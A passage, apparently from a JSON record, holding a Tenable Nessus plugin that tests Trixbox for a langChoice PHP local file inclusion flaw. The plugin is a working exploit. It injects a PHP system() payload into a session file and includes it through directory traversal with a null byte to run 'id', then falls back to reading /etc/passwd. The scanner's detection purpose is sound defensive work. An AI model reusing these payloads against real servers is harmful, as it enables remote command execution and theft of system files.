script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Trixbox langChoice PHP Local File Inclusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:fonality:trixbox\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"trixbox_web_detect.nbin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"www/trixbox\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\nget_kb_item_or_exit(\"www/trixbox\");\n\ncmd = \"id\";\ncmd_pat = \"uid=[0-9]+.*gid=[0-9]+.*\";\nfile = \"/etc/passwd\";\nfile_pat = \"root:.*:0:[01]:\";\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(\"/user\", cgi_dirs());\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Determine if the script exists.\n url = dir + \"/index.php\";\n\n r = http_send_recv3(method: \"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n # If it does...\n if (\n 'form name=\"langForm\"' >< r[2] &&\n 'name=\"langChoice\"' >< r[2]\n )\n {\n # Try to identify the default language.\n default_language = \"\";\n\n pat = 'option value=\"([^\"]+)\" selected=\"selected\"';\n matches = egrep(pattern:pat, string:r[2]);\n if (matches)\n {\n foreach match (split(matches))\n {\n match = chomp(match);\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n default_language = item[1];\n break;\n }\n }\n }\n if (!default_language) default_language = \"english\";\n\n report = \"\";\n vuln = FALSE;\n\n # Try to exploit the issue to execute a command.\n #\n # - first, inject the PHP code into the session file.\n exploit = \"<?php system('\" + cmd + \"'); ?>%00\";\n postdata = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata, port: port,\n content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n # - next, figure out our session id.\n cookie = get_http_cookie(name: \"PHPSESSID\");\n # - now call the session file.\n if (!isnull(cookie))\n {\n exploit = \"../../../../../../../../../../../../tmp/sess_\" +cookie+ \"%00\";\n postdata2 = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata2, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n if (egrep(pattern:cmd_pat, string:r[2]))\n {\n if (report_verbosity)\n {\n report =\n '\\n' +\n 'Nessus was able to execute the command \"' +cmd+ '\" on the remote \\n'+\n 'host using the following URL :\\n' +\n '\\n' +\n build_url(port:port, qs:url) + '\\n'+\n '\\n'+\n 'first with the following POST data :\\n'+\n '\\n'+\n ' ' + str_replace(find:\"&\", replace:'\\n ', string:postdata) + '\\n'+\n '\\n'+\n 'and then again with the following POST data :\\n'+\n '\\n'+\n ' ' + str_replace(find:\"&\", replace:'\\n ', string:postdata2) + '\\n';\n if (report_verbosity > 1)\n {\n output = \"\";\n if (\"trixbox_Language|s:\" >< r[2])\n {\n output = strstr(r[2], \"trixbox_Language|s:\") - \"trixbox_Language|s:\";\n output = strstr(output, ':\"') - ':\"';\n output = output - strstr(output, '\\x00');\n }\n if (!output || !egrep(pattern:cmd_pat, string:output)) output = r[2];\n output = data_protection::redact_etc_passwd(output:output);\n report =\n report+\n '\\n'+\n 'This produced the following output :\\n'+\n '\\n'+\n ' ' + output;\n }\n }\n vuln = TRUE;\n }\n }\n\n # If that failed, try to retrieve a local file.\n if (!vuln)\n {\n exploit = \"../../../../../../../../../../../..\" + file + \"%00\";\n postdata3 = \"langChoice=\" + exploit;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata3, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail : TRUE);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:file_pat, string:r[2]) ||\n # we get an error because magic_quotes was enabled or...\n \"(includes/language/\" + file +\"\\\\0\" >< r[2] ||\n # we get an error claiming the file doesn't exist or...\n \"(includes/language/\" + file >< r[2] ||\n # we get an error about open_basedir restriction.\n \"open_basedir restriction in effect. File(\" + file >< r[2]\n )\n {\n if (report_verbosity && egrep(pattern:file_pat, string:r[2]))\n {\n output = \"\";\n if (\"<!DOCTYPE\" >< r[2]) output = r[2] - strstr(r[2], \"<!DOCTYPE\");\n if (!egrep(pattern:file_pat, string:output)) output = r[2];\n\n report =\n '\\n' +\n 'Here are the (repeated) contents of the file \"' + file + '\" that\\n'+\n 'Nessus was able to read from the remote host :\\n'+\n '\\n' +\n output;\n }\n vuln = TRUE;\n }\n }\n\n # Reset the language in the 'cache/sessionsFile.txt' in case it was changed.\n postdata4 = \"langChoice=\" + default_language;\n\n r = http_send_recv3(method: \"POST\", item: url, data: postdata4, port: port, content_type: \"application/x-www-form-urlencoded\", exit_on_fail:TRUE);\n\n # Issue a report if a problem was found.\n if (vuln)\n {\n if (report) security_hole(port:port, extra:report);\n else security_hole(port);\n exit(0);\n }\n }\n}\nif (!vuln)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"trixbox\", build_url(qs:'/', port:port));\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
